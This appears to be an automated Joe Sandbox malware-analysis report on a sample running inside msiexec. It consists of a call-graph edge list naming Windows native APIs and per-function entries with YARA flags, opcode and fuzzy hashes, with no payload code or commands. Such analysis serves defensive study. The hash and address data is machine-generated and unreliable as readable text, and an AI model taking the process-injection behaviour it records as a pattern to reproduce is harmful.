47837 ab7b0 RtlFreeHeap 47836->47837 47841 a4b83 47837->47841 47838 a4d09 47839 a9e80 NtClose 47838->47839 47840 a4d10 47839->47840 47840->47818 47841->47834 47841->47838 47842 a4c79 47841->47842 47843 a4c21 47841->47843 47842->47838 47847 a4c8c 47842->47847 47844 a4c26 47843->47844 47845 a4c3f 47843->47845 47846 a4c57 47843->47846 47844->47818 47876 a46b0 47845->47876 47846->47840 47884 a43d0 47846->47884 47912 a9e80 47847->47912 47849 a4c4d 47849->47818 47852 a4c6f 47852->47818 47853 a4cf8 47853->47818 47856 aaaf1 47854->47856 47855 aab03 47855->47821 47856->47855 47918 a4030 47856->47918 47858 aab47 47859 aab70 47858->47859 47860 a4030 RtlFreeHeap 47858->47860 47859->47821 47862 aab69 47860->47862 47862->47859 47933 a5350 47862->47933 47863 aabfa 47943 a98b0 47863->47943 47867 a990c 47866->47867 47955 270fae8 LdrInitializeThunk 47867->47955 47868 a9927 47870 ab7b0 47868->47870 47956 aa060 47870->47956 47872 aad49 47872->47804 47874 aa950 47873->47874 47875 a9d6c NtCreateFile 47874->47875 47875->47836 47877 a46cc 47876->47877 47878 a4708 47877->47878 47879 a46f4 47877->47879 47881 a9e80 NtClose 47878->47881 47880 a9e80 NtClose 47879->47880 47882 a46fd 47880->47882 47883 a4711 47881->47883 47882->47849 47883->47849 47885 a441b 47884->47885 47886 a444e 47884->47886 47888 a9e80 NtClose 47885->47888 47887 a446a 47886->47887 47892 a4599 47886->47892 47890 a448c 47887->47890 47891 a44a1 47887->47891 47889 a443f 47888->47889 47889->47852 47893 a9e80 NtClose 47890->47893 47894 a44a6 47891->47894 47900 a44bc 47891->47900 47895 a9e80 NtClose 47892->47895 47896 a4495 47893->47896 47897 a9e80 NtClose 47894->47897 47898 a45f9 47895->47898 47896->47852 47899 a44af 47897->47899 47898->47852 47899->47852 47903 a44d3 47900->47903 47915 a9e00 47900->47915 47902 a4527 47904 a455a 47902->47904 47905 a4545 47902->47905 47903->47852 47906 a9e80 NtClose 47904->47906 47907 a9e80 NtClose 47905->47907 47909 a4563 47906->47909 47907->47903 47908 a458f 47908->47852 47909->47908 47910 ab7b0 RtlFreeHeap 47909->47910 47911 a4583 47910->47911 47911->47852 47913 aa950 47912->47913 47914 a9e9c NtClose 47913->47914 47914->47853 47916 aa950 47915->47916 47917 a9e1c NtReadFile 47916->47917 47917->47902 47919 a4041 47918->47919 47922 a4049 47918->47922 47919->47858 47920 a431c 47920->47858 47922->47920 47929 a40f6 47922->47929 47947 ac9c0 47922->47947 47925 ac980 RtlFreeHeap 47926 a42fe 47925->47926 47927 ac980 RtlFreeHeap 47926->47927 47928 a4308 47927->47928 47930 ac980 RtlFreeHeap 47928->47930 47951 ac980 47929->47951 47931 a4312 47930->47931 47932 ac980 RtlFreeHeap 47931->47932 47932->47920 47934 a5361 47933->47934 47935 a4a10 4 API calls 47934->47935 47937 a5377 47935->47937 47936 a53ca 47936->47863 47937->47936 47938 a53b2 47937->47938 47939 a53c5 47937->47939 47940 ab7b0 RtlFreeHeap 47938->47940 47941 ab7b0 RtlFreeHeap 47939->47941 47942 a53b7 47940->47942 47941->47936 47942->47863 47944 a98cc 47943->47944 47954 270fdc0 LdrInitializeThunk 47944->47954 47945 a98e3 47945->47821 47948 aca1d 47947->47948 47949 ac9e5 47947->47949 47948->47922 47950 ab7b0 RtlFreeHeap 47949->47950 47950->47948 47952 ab7b0 RtlFreeHeap 47951->47952 47953 a42f4 47952->47953 47953->47925 47954->47945 47955->47868 47957 aa950 47956->47957 47958 aa07c RtlFreeHeap 47957->47958 47958->47872 47960 97e8b 47959->47960 47961 97e90 47959->47961 47960->47829 47962 97f18 47961->47962 47963 a98b0 LdrInitializeThunk 47961->47963 47964 97f1e 47961->47964 47972 a9fb0 47961->47972 47962->47829 47963->47961 47965 97f44 47964->47965 47967 a9fb0 LdrInitializeThunk 47964->47967 47965->47829 47968 97f35 47967->47968 47968->47829 47970 9815e 47969->47970 47971 a9fb0 LdrInitializeThunk 47969->47971 47970->47806 47971->47970 47973 a9fcc 47972->47973 47976 270fb68 LdrInitializeThunk 47973->47976 47974 a9fe3 47974->47961 47976->47974 47978 aa1df LookupPrivilegeValueW 47977->47978 47979 aa950 47977->47979 47978->47811 47979->47978 47981 a9c6c 47980->47981 47984 270fed0 LdrInitializeThunk 47981->47984 47982 a9c8b 47982->47812 47984->47982 47986 9f36c 47985->47986 48028 9f250 47986->48028 47989 9f399 47991 9f3a4 47989->47991 47993 a9e80 NtClose 47989->47993 47990 9f3b1 47992 9f3c2 47990->47992 47994 a9e80 NtClose 47990->47994 47991->47780 47992->47780 47993->47991 47994->47992 47996 9f3fc 47995->47996 47997 9f250 2 API calls 47996->47997 47998 9f41f 47997->47998 47999 9f429 47998->47999 48000 9f441 47998->48000 48002 9f434 47999->48002 48003 a9e80 NtClose 47999->48003 48001 9f452 48000->48001 48004 a9e80 NtClose 48000->48004 48001->47783 48002->47783 48003->48002 48004->48001 48006 9ca76 48005->48006 48008 9ca80 48005->48008 48006->47785 48007 9cb44 48007->47785 48008->48007 48009 a4a10 4 API calls 48008->48009 48010 9cbb5 48009->48010 48010->47785 48012 9d616 48011->48012 48039 9d2e0 48012->48039 48014 9d67c 48014->47794 48062 9f690 48015->48062 48017 98f05 48017->47770 48018 98cf4 48018->48017 48066 a4360 48018->48066 48020 98d50 48020->48017 48069 98a90 48020->48069 48022 97e80 2 API calls 48025 98d84 48022->48025 48025->48017 48025->48022 48026 9c780 12 API calls 48025->48026 48027 98140 LdrInitializeThunk 48025->48027 48073 9f630 48025->48073 48077 9f040 NtCreateFile NtReadFile NtClose RtlFreeHeap 48025->48077 48026->48025 48027->48025 48029 9f320 48028->48029 48030 9f26a 48028->48030 48029->47989 48029->47990 48034 a9970 48030->48034 48033 a9e80 NtClose 48033->48029 48035 a998c 48034->48035 48038 27107ac LdrInitializeThunk 48035->48038 48036 9f314 48036->48033 48038->48036 48040 9d2f7 48039->48040 48045 9f6d0 48040->48045 48044 9d36b 48044->48014 48046 9f6f5 48045->48046 48055 98180 48046->48055 48048 9d33f 48052 aa0d0 48048->48052 48049 a4a10 4 API calls 48050 9f719 48049->48050 48050->48048 48050->48049 48051 ab7b0 RtlFreeHeap 48050->48051 48051->48050 48053 aa950 48052->48053 48054 aa0ef CreateProcessInternalW 48053->48054 48054->48044 48056 9827f 48055->48056 48057 98195 48055->48057 48056->48050 48057->48056 48058 a4a10 4 API calls 48057->48058 48059 98202 48058->48059 48060 ab7b0 RtlFreeHeap 48059->48060 48061 98229 48059->48061 48060->48061 48061->48050 48063 9f6af 48062->48063 48064 9f6bd 48063->48064 48065 9f6b6 SetErrorMode 48063->48065 48064->48018 48065->48064 48068 a4386 48066->48068 48078 9f460 48066->48078 48068->48020 48072 98ab5 48069->48072 48070 98cca 48070->48025 48072->48070 48095 a9270 48072->48095 48074 9f643 48073->48074 48125 a9880 48074->48125 48077->48025 48079 9f47d 48078->48079 48085 a99b0 48079->48085 48082 9f4c5 48082->48068 48086 a99cc 48085->48086 48093 270ffb4 LdrInitializeThunk 48086->48093 48087 9f4be 48087->48082 48089 a9a00 48087->48089 48090 a9a1c 48089->48090 48094 270fc60 LdrInitializeThunk 48090->48094 48091 9f4ee 48091->48068 48093->48087 48094->48091 48096 a9287 48095->48096 48109 992f0 48096->48109 48098 a92a2 48099 a92c9 48098->48099 48102 a92e0 48098->48102 48100 ab7b0 RtlFreeHeap 48099->48100 48101 a92d6 48100->48101 48101->48070 48103 a95c0 48102->48103 48106 a95d4 48102->48106 48104 ab7b0 RtlFreeHeap 48103->48104 48105 a95ca 48104->48105 48105->48070 48107 ab7b0 RtlFreeHeap 48106->48107 48108 a9629 48107->48108 48108->48070 48110 99315 48109->48110 48111 9936d 48110->48111 48113 9cef0 48110->48113 48111->48098 48114 9cf1c 48113->48114 48115 9cf3c 48114->48115 48120 a9c10 48114->48120 48115->48111 48117 9cf5f 48117->48115 48118 a9e80 NtClose 48117->48118 48119 9cf9a 48118->48119 48119->48111 48121 a9c2c 48120->48121 48124 270fbb8 LdrInitializeThunk 48121->48124 48122 a9c47 48122->48117 48124->48122 48126 a989c 48125->48126 48129 270fd8c LdrInitializeThunk 48126->48129 48127 9f66e 48127->48025 48129->48127 48241 27298ba 8 API calls 48131 a43c6 NtReadFile NtClose RtlFreeHeap 48135 9d2d8 NtCreateFile NtReadFile NtClose RtlFreeHeap CreateProcessInternalW 48130 992e3 NtClose LdrInitializeThunk 48282 2700184 5 API calls __cftof

                                            Executed Functions

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 153 a9d50-a9da1 call aa950 NtCreateFile
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 000A9D9D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`$wK
                                            • API String ID: 823142352-3168009529
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: 62242dcb0cb6cb8fdf35feb000ed7ba1a4cfa2e7837d57956a909346ba261c97
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: 78F0BDB2200208AFCB48CF88DC95EEB77ADAF8C754F158248BA1D97241C630E811CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 423 a9e00-a9e49 call aa950 NtReadFile
                                            APIs
                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,000A49F1,?,?,?,?,000A49F1,FFFFFFFF,?,2M,?,00000000), ref: 000A9E45
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: 70e5ea030badbcfc9ed191148f65edb957fd12e1c00fe8351278fcc326b9016a
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: 59F0B7B2200209AFCB14DF89DC91EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(000A4D10,?,?,000A4D10,00000000,FFFFFFFF), ref: 000A9EA5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_90000_msiexec.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction ID: ad80bea982b162e0ff2c0d492a8af675178a6ed854df20590b9153291bfaf133
                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                            • Instruction Fuzzy Hash: E8D01776600214ABD710EBD8CC86EE77BACEF49760F154499BA5C9B282C630FA0086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                            • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                            • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                            • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                            • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                            • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                            • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                            • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                            • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                            • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                            • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                            • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                            • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                            • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                            • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                            • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                            • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                            • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                            • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                            • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                            • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                            • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                            • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                            • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                            • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                            • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                            • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                            • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                            • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                            • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                            • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                            • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                            • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                            • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.666595776.0000000002700000.00000040.00000001.sdmp, Offset: 026F0000, based on PE: true
                                            • Associated: 00000008.00000002.666576609.00000000026F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666701313.00000000027E0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666726521.00000000027F0000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666740019.00000000027F4000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666752265.00000000027F7000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666774306.0000000002800000.00000040.00000001.sdmp Download File
                                            • Associated: 00000008.00000002.666814054.0000000002860000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_26f0000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                            • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
